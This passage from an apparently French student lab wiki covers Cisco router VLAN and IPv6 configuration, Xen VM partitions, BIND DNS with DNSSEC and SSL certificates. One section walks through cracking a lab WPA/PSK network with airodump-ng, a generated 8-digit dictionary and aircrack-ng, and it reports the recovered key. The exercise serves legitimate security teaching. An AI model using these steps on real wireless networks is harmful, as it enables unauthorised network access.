 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
====Mise en place des partitions pour la VM====&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
====Mise en place serveur DNS====&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
        // };&lt;br /&gt;
  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.space &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
====Certificat SSL====&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Installation de DNSSEC====&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
===Séance 3.5 : 14/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Craquage WPA/PSK par dictionnaire====&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
=====Récupération du handshake=====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
On dispose ensuite de 4 fichiers FILENAME.cap FILENAME.csv FILENAME.kismet.csv FILENAME.kismet.netxml&lt;br /&gt;
&lt;br /&gt;
On peut à présent transférer ces fichiers sur ZABETH13 via clé usb:&lt;br /&gt;
&lt;br /&gt;
=====Rappel montage USB=====&lt;br /&gt;
&lt;br /&gt;
 #fdisk -l                                                 //avant de brancher la clé USB&lt;br /&gt;
 #fdisk -l                                                 //on récupère l'emplacement de la clé (ex: /dev/sdb -&amp;gt; /dev/sdb1)&lt;br /&gt;
 #mkdir /media/MA_CLE_USB&lt;br /&gt;
 #mount /dev/sdb1 /media/MA_CLE_USB&lt;br /&gt;
 #mv /home/pifou/Mon_FICHIER /media/MA_CLE_USB             //répéter autant que nécessaire&lt;br /&gt;
 #umount /media/MA_CLE_USB&lt;br /&gt;
&lt;br /&gt;
=====Crack WPA/PSK=====&lt;br /&gt;
&lt;br /&gt;
On crée un petit programme &amp;lt;code&amp;gt;main.c&amp;lt;/code&amp;gt; pour lister tous les codes possibles, on sait qu'il s'agit d'un code de 8 chiffres&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     int i;&lt;br /&gt;
     // key is 8 numeric digits&lt;br /&gt;
     for(i=0;i&amp;lt;99999999;i++){&lt;br /&gt;
         printf(&amp;quot;%d\n&amp;quot;,i);&lt;br /&gt;
     }&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
On compile et on stock dans un txt&lt;br /&gt;
&lt;br /&gt;
 #gcc main.c -o main -Wall&lt;br /&gt;
 #./main &amp;gt; dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
On peut à présent lancer le crack&lt;br /&gt;
&lt;br /&gt;
 #aircrack-ng FILENAME.cap -w dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crack-cracotte02.png]]&lt;br /&gt;
&lt;br /&gt;
Après un certains temps d'execution, on obtient la clé&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Found_key.png]]&lt;br /&gt;
&lt;br /&gt;
Clé : 42429902&lt;br /&gt;
===Séance 4 : 17/12/2018===&lt;br /&gt;
====Correction IPV6 routeur====&lt;br /&gt;
&lt;br /&gt;
===== Vlan 43 - XEN =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 131 - Interconnexion =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 10+N - Groupe N =====&lt;br /&gt;
&lt;br /&gt;
'''IPv4'''&lt;br /&gt;
&lt;br /&gt;
* Notre Routeur : &amp;lt;code&amp;gt;10.60.10+N.252&amp;lt;/code&amp;gt;&lt;br /&gt;
* Routeur Virtuel : &amp;lt;code&amp;gt;10.60.10+N.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''IPv6'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;2001:660:4401:60XX&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* VLAN 11 à 21 : &amp;lt;code&amp;gt;C1&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;CB&amp;lt;/code&amp;gt;&lt;br /&gt;
* VLAN 43 : &amp;lt;code&amp;gt;C0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Groupe 1&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan11&lt;br /&gt;
 int vlan11&lt;br /&gt;
 ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 11 ip 10.60.11.254&lt;br /&gt;
 standby 11 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 11&lt;br /&gt;
 name groupe1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 2&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan12&lt;br /&gt;
 int vlan12&lt;br /&gt;
 ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 12 ip 10.60.12.254&lt;br /&gt;
 standby 12 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 12&lt;br /&gt;
 name groupe2&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 3&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan13&lt;br /&gt;
 int vlan13&lt;br /&gt;
 ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 13 ip 10.60.13.254&lt;br /&gt;
 standby 13 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 13&lt;br /&gt;
 name groupe3&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 4&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan14&lt;br /&gt;
 int vlan14&lt;br /&gt;
 ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 14 ip 10.60.14.254&lt;br /&gt;
 standby 14 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 14&lt;br /&gt;
 name groupe4&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 5&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan15&lt;br /&gt;
 int vlan15&lt;br /&gt;
 ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 15 ip 10.60.15.254&lt;br /&gt;
 standby 15 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 15&lt;br /&gt;
 name groupe5&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan16&lt;br /&gt;
 int vlan16&lt;br /&gt;
 ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 16 ip 10.60.16.254&lt;br /&gt;
 standby 16 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 16&lt;br /&gt;
 name groupe6&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 7&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan17&lt;br /&gt;
 int vlan17&lt;br /&gt;
 ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 17 ip 10.60.17.254&lt;br /&gt;
 standby 17 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 17&lt;br /&gt;
 name groupe7&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 8&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan18&lt;br /&gt;
 int vlan18&lt;br /&gt;
 ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 18 ip 10.60.18.254&lt;br /&gt;
 standby 18 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 18&lt;br /&gt;
 name groupe8&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 9&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan19&lt;br /&gt;
 int vlan19&lt;br /&gt;
 ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 19 ip 10.60.19.254&lt;br /&gt;
 standby 19 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 19&lt;br /&gt;
 name groupe9&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 10&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan20&lt;br /&gt;
 int vlan20&lt;br /&gt;
 ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 20 ip 10.60.20.254&lt;br /&gt;
 standby 20 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 20&lt;br /&gt;
 name groupe10&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 11&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan21&lt;br /&gt;
 int vlan21&lt;br /&gt;
 ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 21 ip 10.60.21.254&lt;br /&gt;
 standby 21 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 21&lt;br /&gt;
 name groupe11&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérifications du fonctionnement =====&lt;br /&gt;
&lt;br /&gt;
====== show running-config ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show run &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 spanning-tree mode pvst&lt;br /&gt;
 spanning-tree loopguard default&lt;br /&gt;
 spanning-tree etherchannel guard misconfig&lt;br /&gt;
 spanning-tree extend system-id&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/3&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/4&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/5&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/6&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/7&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !         &lt;br /&gt;
 interface GigabitEthernet0/8&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/9&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/10&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/11&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface TenGigabitEthernet0/1&lt;br /&gt;
  switchport access vlan 131&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface TenGigabitEthernet0/2&lt;br /&gt;
  switchport access vlan 43&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan11&lt;br /&gt;
  ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 11 ip 10.60.11.254&lt;br /&gt;
  standby 11 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan12&lt;br /&gt;
  ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 12 ip 10.60.12.254&lt;br /&gt;
  standby 12 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan13&lt;br /&gt;
  ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 13 ip 10.60.13.254&lt;br /&gt;
  standby 13 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan14&lt;br /&gt;
  ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 14 ip 10.60.14.254&lt;br /&gt;
  standby 14 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan15&lt;br /&gt;
  ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 15 ip 10.60.15.254&lt;br /&gt;
  standby 15 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan16&lt;br /&gt;
  ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 16 ip 10.60.16.254&lt;br /&gt;
  standby 16 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan17&lt;br /&gt;
  ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 17 ip 10.60.17.254&lt;br /&gt;
  standby 17 preempt&lt;br /&gt;
 !         &lt;br /&gt;
 interface Vlan18&lt;br /&gt;
  ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 18 ip 10.60.18.254&lt;br /&gt;
